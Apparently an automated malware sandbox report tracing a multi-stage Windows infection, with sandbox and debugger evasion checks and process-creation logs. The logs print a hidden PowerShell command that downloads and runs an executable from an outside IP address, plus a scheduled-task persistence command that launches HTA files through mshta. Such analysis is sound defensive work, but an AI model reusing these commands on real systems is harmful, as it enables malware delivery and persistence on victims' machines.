Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	File opened: C:\Users\user\AppData\Local\Temp\7A54.tmp\7A55.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	File opened: C:\Users\user\AppData\Local\Temp\7A54.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	File opened: C:\Users\user\AppData\Local\Temp\7A54.tmp\7A55.tmp\7A56.tmp	Jump to behavior

Source: skotes.exe, skotes.exe, 00000002.00000000.1815184685.00000000009E8000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1873719330.00000000009EA000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000000.2291117818.00000000009E8000.00000080.00000001.01000000.00000007.sdmp, 483d2fa8a0d53818306efeb32d3.exe, 483d2fa8a0d53818306efeb32d3.exe, 00000038.00000002.2583490087.0000000000271000.00000040.00000001.01000000.00000015.sdmp, 483d2fa8a0d53818306efeb32d3.exe, 00000038.00000001.2519008490.0000000000271000.00000080.00000001.01000000.00000015.sdmp, 483d2fa8a0d53818306efeb32d3.exe, 0000003E.00000002.2604633172.0000000000271000.00000040.00000001.01000000.00000015.sdmp, 483d2fa8a0d53818306efeb32d3.exe, 0000004C.00000002.2709008836.0000000000271000.00000040.00000001.01000000.00000015.sdmp, 483d2fa8a0d53818306efeb32d3.exe, 0000005D.00000002.2891692288.0000000000271000.00000040.00000001.01000000.00000015.sdmp, 483d2fa8a0d53818306efeb32d3.exe, 0000005E.00000002.2800266575.0000000000271000.00000040.00000001.01000000.00000015.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: powershell.exe, 00000049.00000002.3142154835.000001DBA01F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}c
Source: mshta.exe, 0000001B.00000003.2482683801.00000195C90A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\7
Source: mshta.exe, 0000001E.00000003.2443813104.0000000002A77000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000003.1803870598.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}5Gt&
Source: powershell.exe, 00000049.00000002.3159486396.000001DBA05AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
Source: powershell.exe, 0000005B.00000002.3246069714.000002072FAC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: powershell.exe, 00000022.00000002.2647223071.0000000007304000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
Source: mshta.exe, 0000001E.00000003.2443813104.0000000002A77000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 0000005B.00000002.3246069714.000002072FA8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: powershell.exe, 00000022.00000002.2639810922.0000000007269000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: powershell.exe, 00000049.00000002.3159486396.000001DBA05DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}os
Source: powershell.exe, 00000022.00000002.2639810922.0000000007269000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\.Ser
Source: file.exe, skotes.exe.0.dr	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_05030732 rdtsc

0_2_05030732

Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe

Code function: 7_2_0040ADD6 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,

7_2_0040ADD6

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9652B mov eax, dword ptr fs:[00000030h]	0_2_00F9652B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9A302 mov eax, dword ptr fs:[00000030h]	0_2_00F9A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_0082A302 mov eax, dword ptr fs:[00000030h]	1_2_0082A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_0082652B mov eax, dword ptr fs:[00000030h]	1_2_0082652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0082A302 mov eax, dword ptr fs:[00000030h]	2_2_0082A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0082652B mov eax, dword ptr fs:[00000030h]	2_2_0082652B
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Code function: 56_2_000BA302 mov eax, dword ptr fs:[00000030h]	56_2_000BA302
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Code function: 56_2_000B652B mov eax, dword ptr fs:[00000030h]	56_2_000B652B

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 7_2_00409FD0 SetUnhandledExceptionFilter,	7_2_00409FD0
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 7_2_00409FB0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	7_2_00409FB0
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 12_2_00409FD0 SetUnhandledExceptionFilter,	12_2_00409FD0
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: 12_2_00409FB0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	12_2_00409FB0

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_7484.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_7432.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_1516.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_6964.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_5316.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_6156.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_7284.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 3156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 2412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 3964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 7408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 4108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 2504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 7268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7284, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe" any_word	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" any_word	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\.hta"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\\random.hta"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\\random.hta"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
